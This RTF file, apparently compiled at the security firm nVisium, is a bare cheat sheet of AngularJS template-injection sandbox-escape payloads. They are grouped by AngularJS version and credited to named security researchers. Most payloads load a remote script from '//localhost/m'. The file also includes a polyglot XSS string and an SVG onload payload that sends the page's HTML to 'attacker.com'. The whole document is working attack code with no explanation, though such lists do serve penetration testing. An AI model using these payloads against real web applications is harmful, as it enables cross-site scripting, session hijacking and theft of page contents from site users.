{\rtf1\ansi\ansicpg1252\cocoartf1671\cocoasubrtf400
{\fonttbl\f0\fnil\fcharset0 HelveticaNeue;\f1\fnil\fcharset0 Menlo-Regular;\f2\fswiss\fcharset0 Helvetica-Light;
}
{\colortbl;\red255\green255\blue255;\red16\green18\blue20;\red243\green246\blue249;\red16\green18\blue20;
\red243\green246\blue249;\red123\green126\blue121;\red245\green245\blue245;\red0\green0\blue0;\red109\green109\blue109;
\red95\green124\blue3;\red247\green86\blue21;\red16\green22\blue36;}
{\*\expandedcolortbl;;\cssrgb\c7843\c9020\c10196;\cssrgb\c96078\c97255\c98039;\cssrgb\c7843\c9020\c10196;
\cssrgb\c96078\c97255\c98039;\cssrgb\c55686\c56471\c54902;\cssrgb\c96863\c96863\c96863;\cssrgb\c0\c0\c0;\cssrgb\c50196\c50196\c50196;
\cssrgb\c44314\c54902\c0;\cssrgb\c98431\c42745\c9804;\cssrgb\c7843\c11765\c18824;}
{\info
{\author J.R. Myers}
{\*\company nVisium}}\margl1440\margr1440\vieww16460\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\sl320\partightenfactor0

\f0\fs28 \cf2 \cb3 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 \{\{$eval.constructor('alert(1)')()\}\}\
\{\{$on.constructor('alert(1)')()\}\}\cf4 \cb5 \outl0\strokewidth0 \
\pard\pardeftab720\sl320\partightenfactor0
\cf4 <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">\

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth37832\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt108 \clpadl300 \clpadb108 \clpadr108 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf6 \cb7 \outl0\strokewidth0 \strokec6 // Not validated\cf8 \cb1 \strokec8 \
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0
\cf8 \cb7 javascript:\cf10 \strokec10 "/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html "\cf8 \strokec8  onmouseover=\cf6 \strokec6 /*&lt;svg/*/\cf8 \strokec8 onload=\cf11 \strokec11 eval\cf8 \strokec8 (\cf10 \strokec10 "var _ = document.createElement('script');_.src='//localhost/m';document.getElementsByTagName('body')[0].appendChild(_)"\cf8 \strokec8 )\cf6 \strokec6 //>\cf8 \strokec8 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \cb1 #1.0.1 - 1.1.5 && > 1.6.0\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/cure53berlin"}}{\fldrslt \cf12 \strokec12 Mario Heiderich}}\'a0(Cure53)\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth13380\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     constructor.constructor("var _ = document.createElement('script');\cb1 \
\cb7     _.src='//localhost/m';\cb1 \
\cb7     document.getElementsByTagName('body')[0].appendChild(_)")()\cb1 \
\cb7 \}\}\cb1 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \
Shorter 1.0.1 - 1.1.5 && > 1.6.0\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/lewisardern"}}{\fldrslt \cf12 \strokec12 Lewis Ardern}}\'a0(Synopsys) and\'a0{\field{\*\fldinst{HYPERLINK "https://twitter.com/garethheyes"}}{\fldrslt \cf12 \strokec12 Gareth Heyes}}\'a0(PortSwigger)\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth13380\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     $on.constructor("var _ = document.createElement('script');\cb1 \
\cb7     _.src='//localhost/m';\cb1 \
\cb7     document.getElementsByTagName('body')[0].appendChild(_)")()\cb1 \
\cb7 \}\}\cb1 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \
1.2.0 - 1.2.5\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/garethheyes"}}{\fldrslt \cf12 \strokec12 Gareth Heyes}}\'a0(PortSwigger)\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth13380\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     a="a"["constructor"].prototype;a.charAt=a.trim;\cb1 \
\cb7     $eval('a",eval(`var _=document\\\\x2ecreateElement(\\'script\\');\cb1 \
\cb7     _\\\\x2esrc=\\'//localhost/m\\';\cb1 \
\cb7     document\\\\x2ebody\\\\x2eappendChild(_);`),"')\cb1 \
\cb7 \}\}\cb1 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \
1.2.6 - 1.2.18\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/tehjh"}}{\fldrslt \cf12 \strokec12 Jan Horn}}\'a0(Cure53, now works at Google Project Zero)\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth14845\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     (_=''.sub).call.call(\{\}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'eval("\cb1 \
\cb7         var _ = document.createElement(\\'script\\');\cb1 \
\cb7         _.src=\\'//localhost/m\\';\cb1 \
\cb7         document.getElementsByTagName(\\'body\\')[0].appendChild(_)")')()\cb1 \
\cb7 \}\}\cb1 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \
1.2.19 (FireFox)\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/avlidienbrunn"}}{\fldrslt \cf12 \strokec12 Mathias Karlsson}}\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth13833\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     toString.constructor.prototype.toString=toString.constructor.prototype.call;\cb1 \
\cb7     ["a",'eval("var _ = document.createElement(\\'script\\');\cb1 \
\cb7     _.src=\\'//localhost/m\\';\cb1 \
\cb7     document.getElementsByTagName(\\'body\\')[0].appendChild(_)")'].sort(toString.constructor);\cb1 \
\cb7 \}\}\cb1 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \
1.2.20 - 1.2.29\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/garethheyes"}}{\fldrslt \cf12 \strokec12 Gareth Heyes}}\'a0(PortSwigger)\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth13380\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     a="a"["constructor"].prototype;a.charAt=a.trim;\cb1 \
\cb7     $eval('a",eval(`\cb1 \
\cb7     var _=document\\\\x2ecreateElement(\\'script\\');\cb1 \
\cb7     _\\\\x2esrc=\\'//localhost/m\\';\cb1 \
\cb7     document\\\\x2ebody\\\\x2eappendChild(_);`),"')\cb1 \
\cb7 \}\}\cb1 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \
1.3.0 - 1.3.9\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/garethheyes"}}{\fldrslt \cf12 \strokec12 Gareth Heyes}}\'a0(PortSwigger)\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth13380\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     a=toString().constructor.prototype;a.charAt=a.trim;\cb1 \
\cb7     $eval('a,eval(`\cb1 \
\cb7     var _=document\\\\x2ecreateElement(\\'script\\');\cb1 \
\cb7     _\\\\x2esrc=\\'//localhost/m\\';\cb1 \
\cb7     document\\\\x2ebody\\\\x2eappendChild(_);`),a')\cb1 \
\cb7 \}\}\cb1 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \
1.4.0 - 1.5.8\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/garethheyes"}}{\fldrslt \cf12 \strokec12 Gareth Heyes}}\'a0(PortSwigger)\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth13380\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     a=toString().constructor.prototype;a.charAt=a.trim;\cb1 \
\cb7     $eval('a,eval(`var _=document.createElement(\\'script\\');\cb1 \
\cb7     _.src=\\'//localhost/m\\';document.body.appendChild(_);`),a')\cb1 \
\cb7 \}\}\cb1 \cell \lastrow\row
\pard\pardeftab720\sl360\sa320\partightenfactor0

\f2\fs32 \cf8 \
1.5.9 - 1.5.11\uc0\u8232 {\field{\*\fldinst{HYPERLINK "https://twitter.com/tehjh"}}{\fldrslt \cf12 \strokec12 Jan Horn}}\'a0(Cure53, now works at Google Project Zero)\uc0\u8232 \

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalc \clshdrawnil \clwWidth41287\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadt96 \clpadl300 \clpadb96 \clpadr96 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\sl320\partightenfactor0

\f1\fs23\fsmilli11560 \cf8 \cb7 \{\{\cb1 \
\cb7     c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;\cb1 \
\cb7     c.$eval=b;op=$root.$$phase;\cb1 \
\cb7     $root.$$phase=null;od=$root.$digest;$root.$digest=(\{\}).toString;\cb1 \
\cb7     C=c.$apply(c);$root.$$phase=op;$root.$digest=od;\cb1 \
\cb7     B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,eval(`var _=document.createElement(\\\\'script\\\\');_.src=\\\\'//localhost/m\\\\';document.body.appendChild(_);`)))+';astNode.argument=\{type:'Identifier',name:'foo'\};");\cb1 \
\cb7     m1=B($$asyncQueue.pop().expression,null,$root);\cb1 \
\cb7     m2=B(C,null,m1);[].push.apply=m2;a=''.sub;\cb1 \
\cb7     $eval('a(b.c)');[].push.apply=a;\cb1 \
\cb7 \}\}\cell \lastrow\row
}